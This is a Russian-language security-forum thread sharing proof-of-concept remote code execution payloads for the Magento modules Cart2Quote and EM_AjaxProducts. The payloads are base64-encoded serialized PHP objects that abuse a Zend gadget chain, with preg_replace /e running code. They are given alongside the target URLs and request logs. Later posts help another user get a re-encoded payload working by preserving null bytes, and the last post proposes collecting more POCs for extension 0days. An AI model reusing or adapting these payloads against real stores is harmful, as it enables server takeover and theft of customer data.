HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [ Обзор уязвимостей Magento ]
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.09.2015, 13:35
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Баги+ФИКСЫ Magento

URL: index.php/qquoteadv/download/downloadCustomOption/

Module: Cart2Quote

POC:

POST: id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=

URL: index.php/ajaxproducts/index/index/

Module: EM_AjaxProducts

POC:

POST: params=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJ vcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nI joxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDo iWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ld mVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2x heW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpb CI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V 0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZ mxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2U iOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguK ikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl 0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuY WJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW9 1dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047f X19fQ==
 
Ответить с цитированием

  #2  
Старый 21.08.2017, 13:45
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
В меру лечения сайтов от вирусов и их безопасности, при снифинге запросов, был выявлен следующий shellcod RCE через унсериализацию данных в плагине:

в кодеровке base64:

Цитата:
Сообщение от None  
YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKg Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
Пример лога:

Цитата:
Сообщение от None  
/*START_LOG*/ 141.101.[HIDEN] | POST | mage.[HIDEN].com/[HIDEN]/ | Mozilla/5.0 ([HIDEN])
--
POST[] id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
/*END_LOG*/
 
Ответить с цитированием

  #3  
Старый 22.08.2017, 01:46
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

был выявлен следующий shellcod RCE через унсериализацию данных в плагине
Под первый зенд, cпаcибо

Что за плагин использовался, секрет?
 
Ответить с цитированием

  #4  
Старый 22.08.2017, 03:08
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

Под первый зенд, cпаcибо
Что за плагин использовался, секрет?
удваиваю, интересно где точка входа :|
 
Ответить с цитированием

  #5  
Старый 22.08.2017, 14:05
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Нет, не секрет, в паблике месяца 3 висит:

Цитата:
Сообщение от None  
/*START_LOG*/ 141.101.[hiden] | POST | mage.[hiden]/index.php/qquoteadv/download/downloadCustomOption/ | Mozilla/5.0 ([Hiden])
--
POST[] id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHR pb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxO ntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmV uZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVud HNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW9 1dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7T zo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0Ijt POjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY 3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI 6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZ SI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8 oKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7c zoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiI AKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
/*END_LOG*/
 
Ответить с цитированием

  #6  
Старый 29.08.2017, 14:21
nick_sale
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
В чем может быть причина? Раскодировал,закодировал по новому - не работает.

Скиньте,раскодированный пример,который после новой перекодировки будет работать,ну и сервис,который нормально это все делает,а то сколько перепробовал - разные сервисы выдают разные варианты.

Начальная строка

YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKg Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=

Раскодированная-закодированная по новому

YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb2 4iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntz OjExOiIgKiBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF 9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IiAqIF9ldmVudHNU b01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiICogX2xheW91dE V2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIgKiBfbWFpbCI7Tzo5 OiJaZW5kX01haWwiOjA6e31zOjEwOiIgKiBfbGF5b3V0IjtPOj ExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiICogX2luZmxlY3Rv ciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3 M6MTY6IiAqIF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7 czoxNToiICogX3JlcGxhY2VtZW50IjtzOjk6InBocGluZm8oKS I7fXM6MjA6IiAqIF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czox MDoiICogX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIgKi Bfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=
 
Ответить с цитированием

  #7  
Старый 29.08.2017, 14:46
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Каким редактором пользуйтесь? NULL байты потерлись... некоторые редакторы их затерают
 
Ответить с цитированием

  #8  
Старый 29.08.2017, 15:21
nick_sale
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

Каким редактором пользуйтесь? NULL байты потерлись... некоторые редакторы их затерают
https://www.base64decode.org/ - тут декодер

редактор notepad++ если я правильно понял
 
Ответить с цитированием

  #9  
Старый 29.08.2017, 15:37
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от nick_sale  
nick_sale said:

редактор notepad++ если я правильно понял
Да, я им пользуюсь и в нем же есть кодер/декодер, с ним у меня все норм работает.
 
Ответить с цитированием

  #10  
Старый 25.10.2018, 11:36
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
В рамках темы hTTps://gwillem.gitlab.io/2018/10/23...tension-0days/ - предлагаю подбить список POC по этим модулям.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ